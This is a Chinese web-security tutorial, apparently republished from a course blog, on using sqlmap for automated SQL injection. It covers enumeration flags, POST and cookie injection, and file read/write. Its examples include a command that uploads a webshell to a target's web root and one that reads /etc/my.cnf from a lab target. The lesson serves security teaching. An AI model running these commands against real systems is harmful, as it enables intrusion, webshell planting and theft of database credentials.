风炫安全WEB安全学习第十八节课使用SQLMAP自动化注入(二

作者: 风炫安全 | 来源:发表于2021-01-07 14:45 被阅读0次

风炫安全WEB安全学习第十八节课使用SQLMAP自动化注入(二)

–is-dba 当前用户权限（是否为root权限）
–dbs 所有数据库
–current-db 网站当前数据库
–users 所有数据库用户
–current-user 当前数据库用户
–random-agent 构造随机user-agent
–passwords 数据库密码
–proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理
–time-sec=TIMESEC DBMS响应的延迟时间（默认为5秒）

post注入

使用burpsuite截取包，然后保存文件为1.txt(文件名随便取)，再使用 sqlmap -r 1.txt --dbs

cookie注入

sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2（只有level达到2才会检测cookie）

读写文件

--file-read=RFILE 从后端的数据库管理系统文件系统读取文件 （物理路径）
--file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 （mssql xp_shell）
--file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

sqlmap -r "c:\request.txt" -p id –dbms mysql –file-dest "e:\php\htdocs\dvwa\inc\include\1.php" –file-write "f:\webshell\1112.php"

将本地的f:\webshell\1112.php 写入到远程服务器上e:\php\htdocs\dvwa\inc\include\1.php

sqlmap -u "http://localhost/pikachu/vul/sqli/sqli_header/sqli_header.php" --cookie 'ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=6i60hcmeappdlkr216jovc0o6l' --level 2 --dbms mysql --file-read "/etc/my.cnf"

读取远程/etc/my.cnf文件

参考：
https://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e5%8d%81%e5%85%ab%e8%8a%82%e8%af%be-%e4%bd%bf%e7%94%a8sqlmap%e8%87%aa%e5%8a%a8%e5%8c%96%e6%b3%a8%e5%85%a5%e4%ba%8c/

网友评论

本文标题：风炫安全WEB安全学习第十八节课使用SQLMAP自动化注入(二

本文链接：https://www.haomeiwen.com/subject/omewoktx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

风炫安全WEB安全学习第十八节课使用SQLMAP自动化注入(二

相关文章

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读

风炫安全WEB安全学习第十八节课 使用SQLMAP自动化注入(二

相关文章

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读

风炫安全WEB安全学习第十八节课使用SQLMAP自动化注入(二